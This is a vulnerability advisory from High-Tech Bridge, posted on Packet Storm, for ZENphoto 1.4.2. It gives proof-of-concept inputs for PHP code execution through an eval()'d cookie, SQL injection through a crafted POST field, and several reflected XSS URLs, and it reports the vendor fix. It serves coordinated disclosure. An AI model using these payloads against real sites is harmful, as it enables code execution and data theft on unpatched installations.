what you don't know can hurt you

ZENphoto 1.4.2 Code Execution / XSS / SQL Injection

ZENphoto 1.4.2 Code Execution / XSS / SQL Injection
Posted Feb 8, 2012
Authored by High-Tech Bridge SA | Site htbridge.com

ZENphoto version 1.4.2 suffers from PHP code execution, cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, php, vulnerability, code execution, xss, sql injection
MD5 | 556b7125d5ca6e0fb7f7fe25475f1001

ZENphoto 1.4.2 Code Execution / XSS / SQL Injection

Change Mirror Download
Advisory ID: HTB23070
Product: ZENphoto
Vendor: www.zenphoto.org
Vulnerable Version: 1.4.2 and probably prior
Tested Version: 1.4.2
Vendor Notification: 18 January 2012
Vendor Patch: 19 January 2012
Public Disclosure: 8 February 2012
Vulnerability Type: PHP Code Execution, SQL Injection, XSS
Solution Status: Fixed by Vendor
Risk Level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in ZENphoto, which can be exploited to perform arbitrary PHP code execution, sql injection and cross site scripting attacks.

1) Arbitrary PHP Code Execution in ZENphoto: CVE-2012-0993

Input passed via "viewer_size_image_saved" COOKIE parameter is not properly sanitised before being used in an "eval()" call.
This can be exploited to execute arbitrary PHP code.

The following PoC is available:


GET /[album_name]/[image.jpg].php HTTP/1.1
Cookie: viewer_size_image_saved=phpinfo()


Successful exploitation of this vulnerability requires that "viewer_size_image" plugin is enabled (disabled by default).

2) SQL Injection in ZENphoto: CVE-2012-0994

Input passed via the "sortableList" POST parameter to /zp-core/admin-albumsort.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


<form action="http://[host]/zp-core/admin-albumsort.php?page=edit&album=1&saved&tab=sort" method="post">
<input type="hidden" name="XSRFToken" value="[XSRFToken]">
<input type="hidden" name="sortableList" value="id[]=3&id[]=2 OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a-1)%2)))">
<input type="submit" id="btn">
</form>


Successful exploitation of this vulnerability requires the attacker to be logged-in and have access to "Manage Albums" function.

3) Multiple XSS in ZENphoto: CVE-2012-0995

3.1 Input passed via the "msg" GET parameters to /zp-core/admin.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC is available:

http://[host]/zp-core/admin.php?action=external&error&msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

This vulnerability can be used against any logged-in user.

3.2 Input appended to the URL is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC is available:

http://[host]/1/xxx%3Cimg+src=x+onerror=alert%28document.cookie%29%3E/

3.3 Input appended to the URL after /zp-core/admin.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC is available:

http://[host]/zp-core/admin.php?a="><script>alert%28document.cookie%29</script>

3.4 Input passed via the "album" GET parameters to /zp-core/admin-edit.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC is available:

http://[host]/zp-core/admin-edit.php?page=edit&album=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&uploaded&subpage=1&tab=imageinfo&albumimagesort=id_desc

This vulnerability can be used against any user with "Manage all albums" privilege.

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Zenphoto 1.4.2.1

More information:
http://www.zenphoto.org/news/zenphoto-1.4.2.1

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23070 - https://www.htbridge.ch/advisory/HTB23070 - Multiple vulnerabilities in ZENphoto.
[2] ZENphoto - http://www.zenphoto.org/ - Zenphoto is a standalone CMS for multimedia focused websites.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close